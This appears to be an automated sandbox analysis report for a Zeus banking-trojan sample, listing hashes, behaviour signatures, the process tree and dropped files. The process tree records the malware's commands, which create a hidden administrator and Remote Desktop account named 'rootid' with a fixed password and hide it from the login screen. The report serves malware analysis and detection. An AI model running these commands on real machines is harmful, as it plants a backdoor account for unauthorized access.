Analysis
-
max time kernel
150s -
max time network
124s -
platform
windows7_x64 -
resource
win7 -
submitted
19-07-2020 16:48
General
-
Target
zeus 2_2.1.0.3.vir.exe
-
Size
199KB
-
MD5
dc6b98b9707c0922ab6a53b3efdd5dac
-
SHA1
a72e76fbd5dfa53b3d27ed9d9e6d194a085d7d0e
-
SHA256
f55d6bd5f13356eda64fae070a5eee1a080f06a0aa69bdd7e137496d88346be3
-
SHA512
04b730c73876fc89eb465ebc069ad1e1bdbfbf5d1654a4bb49457d87ec290dd1832a571dea47adabea0d3f3c0461f8ce70d10fe2e4a82cbb698fed254c5d269b
Score
9/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 33 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Modifies WinLogon 2 TTPs 3 IoCs
-
Runs ping.exe 1 TTPs 7 IoCs
-
Suspicious use of WriteProcessMemory 172 IoCs
-
Loads dropped DLL 5 IoCs
-
Runs net.exe
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
NTFS ADS 1 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\zeus 2_2.1.0.3.vir.exe"C:\Users\Admin\AppData\Local\Temp\zeus 2_2.1.0.3.vir.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Modifies Internet Explorer settings
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\delme.bat" "3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cscript.execscript ldapdi.vbs3⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe user rootid Stormload0987 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user rootid Stormload0987 /add4⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe localgroup Administrators rootid /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators rootid /add4⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe localgroup "Remote Desktop Users" rootid /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" rootid /add4⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe accounts /maxpwage:unlimited3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited4⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v rootid /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Users\Admin\AppData\Local\Temp\new.exenew.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\new.exe"C:\Users\Admin\AppData\Local\Temp\new.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Dera\ifob.exe"C:\Users\Admin\AppData\Roaming\Dera\ifob.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Dera\ifob.exe"C:\Users\Admin\AppData\Roaming\Dera\ifob.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp75392daa.bat"5⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1795011195-1625797998-142733676-1073621974243985992704183383-665834837-721666196"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1885619546-1357878500-104955189414995788351548612191-6565673801931841097832449507"1⤵
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail.exe" -Embedding1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of AdjustPrivilegeToken
- NTFS ADS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\delme.bat
-
C:\Users\Admin\AppData\Local\Temp\ldapdi.vbs
-
C:\Users\Admin\AppData\Local\Temp\new.exe
-
C:\Users\Admin\AppData\Local\Temp\new.exe
-
C:\Users\Admin\AppData\Local\Temp\new.exe
-
C:\Users\Admin\AppData\Local\Temp\tmp75392daa.bat
-
C:\Users\Admin\AppData\Roaming\Dera\ifob.exe
-
C:\Users\Admin\AppData\Roaming\Dera\ifob.exe
-
C:\Users\Admin\AppData\Roaming\Dera\ifob.exe
-
C:\Users\Admin\AppData\Roaming\Onfo\qoreo.gii
-
C:\Users\Admin\AppData\Roaming\Onfo\qoreo.gii
-
\??\PIPE\samr
-
\Users\Admin\AppData\Local\Temp\new.exe
-
\Users\Admin\AppData\Local\Temp\new.exe
-
\Users\Admin\AppData\Local\Temp\new.exe
-
\Users\Admin\AppData\Roaming\Dera\ifob.exe
-
\Users\Admin\AppData\Roaming\Dera\ifob.exe
-
memory/664-43-0x0000000000000000-mapping.dmp
-
memory/792-35-0x000000000040D562-mapping.dmp
-
memory/892-38-0x0000000000000000-mapping.dmp
-
memory/1028-20-0x0000000000000000-mapping.dmp
-
memory/1068-0-0x0000000000000000-mapping.dmp
-
memory/1068-57-0x0000000000000000-mapping.dmp
-
memory/1156-28-0x0000000000000000-mapping.dmp
-
memory/1272-31-0x0000000000000000-mapping.dmp
-
memory/1300-59-0x0000000000050000-0x0000000000077000-memory.dmpFilesize
156KB
-
memory/1300-9-0x0000000000000000-mapping.dmp
-
memory/1300-60-0x000000000005D1DF-mapping.dmp
-
memory/1416-5-0x0000000000000000-mapping.dmp
-
memory/1536-7-0x0000000002850000-0x0000000002854000-memory.dmpFilesize
16KB
-
memory/1536-1-0x0000000000000000-mapping.dmp
-
memory/1544-52-0x0000000003AF0000-0x0000000003AF2000-memory.dmpFilesize
8KB
-
memory/1544-53-0x0000000003AE0000-0x0000000003AE2000-memory.dmpFilesize
8KB
-
memory/1544-68-0x0000000003E70000-0x0000000003E72000-memory.dmpFilesize
8KB
-
memory/1544-67-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-66-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-65-0x0000000003DD0000-0x0000000003DD2000-memory.dmpFilesize
8KB
-
memory/1544-64-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-40-0x0000000003890000-0x0000000003990000-memory.dmpFilesize
1024KB
-
memory/1544-42-0x0000000003890000-0x0000000003A90000-memory.dmpFilesize
2.0MB
-
memory/1544-63-0x0000000003BC0000-0x0000000003BC2000-memory.dmpFilesize
8KB
-
memory/1544-45-0x0000000003890000-0x0000000003990000-memory.dmpFilesize
1024KB
-
memory/1544-46-0x0000000003890000-0x0000000003A90000-memory.dmpFilesize
2.0MB
-
memory/1544-47-0x0000000003990000-0x0000000003A90000-memory.dmpFilesize
1024KB
-
memory/1544-51-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-62-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-61-0x0000000003E40000-0x0000000003E42000-memory.dmpFilesize
8KB
-
memory/1544-54-0x0000000003AD0000-0x0000000003AD2000-memory.dmpFilesize
8KB
-
memory/1544-55-0x0000000003E60000-0x0000000003E62000-memory.dmpFilesize
8KB
-
memory/1584-13-0x0000000000000000-mapping.dmp
-
memory/1632-17-0x0000000000000000-mapping.dmp
-
memory/1656-15-0x0000000000000000-mapping.dmp
-
memory/1688-16-0x0000000000000000-mapping.dmp
-
memory/1716-56-0x0000000000000000-mapping.dmp
-
memory/1804-4-0x0000000000000000-mapping.dmp
-
memory/1836-10-0x0000000000000000-mapping.dmp
-
memory/1908-11-0x0000000000000000-mapping.dmp
-
memory/1944-6-0x0000000000000000-mapping.dmp
-
memory/1968-8-0x0000000000000000-mapping.dmp
-
memory/2004-12-0x0000000000000000-mapping.dmp
-
memory/2028-24-0x0000000000400000-0x0000000000427000-memory.dmpFilesize
156KB
-
memory/2028-25-0x000000000040D562-mapping.dmp
-
memory/2028-27-0x0000000000400000-0x0000000000427000-memory.dmpFilesize
156KB